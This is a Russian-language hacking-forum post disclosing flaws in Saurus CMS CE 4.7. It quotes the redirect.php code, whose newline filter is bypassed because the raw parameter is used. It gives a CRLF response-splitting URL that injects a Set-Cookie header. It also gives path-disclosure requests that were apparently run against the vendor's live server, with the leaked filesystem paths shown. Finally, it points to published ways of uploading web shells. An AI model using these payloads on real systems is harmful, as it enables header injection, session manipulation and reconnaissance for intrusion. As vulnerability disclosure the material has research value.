Показать сообщение отдельно

  #8  
Старый 23.12.2011, 05:10
Drager
Новичок
Регистрация: 02.11.2011
Сообщений: 12
С нами:
7646006

Репутация: 32
По умолчанию

Saurus CMS CE Version 4.7 @ 01.12.2011 [http://www.saurus.info/get-saurus-cms/]

HTTP Response Splitting/Path Disclosure

Уязвимость существует при обработке входных данных в параметре "url" сценария "redirect.php" [/editor/redirect.php].

Код:
if($_GET['url'])
{
	$url = urldecode($_GET['url']);

	//prevent Response Splitting attack
	$url = preg_replace("!\r|\n.*!s", "", $url);
	
	header('Location: '.$_GET['url']);
}
else 
{
	header('Location: index.php');
}
Код:
http://[host1]/sau/editor/redirect.php?url=http://[host2]/target.php%0d%0aSet-Cookie: Name=Value
Интерпретатор PHP содержит защиту от атак, начиная с версий 4.4.2 и 5.1.2.

В виду того, что у меня в наличии имеется только версия PHP Version 5.2.12, попробовать не удалось.

Поэтому, Path Disclosure:

Код:
http://www.saurus.info/editor/redirect.php?url=%0D%0ALocation:%20http://www.google.com
=>  Warning: Header may not contain more than a single header, new line detected. in /data01/virt2962/domeenid/www.saurus.ee/htdocs/editor/redirect.php on line 88
Код:
Path Disclosure: Illegal Session Injection
Пишем вместо PHPSESSID всякую #$&%^**(@#:
=>  Warning: session_start() [function.session-start]: The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /data01/virt2962/domeenid/www.saurus.ee/htdocs/index.php on line 236
Способы заливки шелловопубликованы:[#_1] [#_2]
 
Ответить с цитированием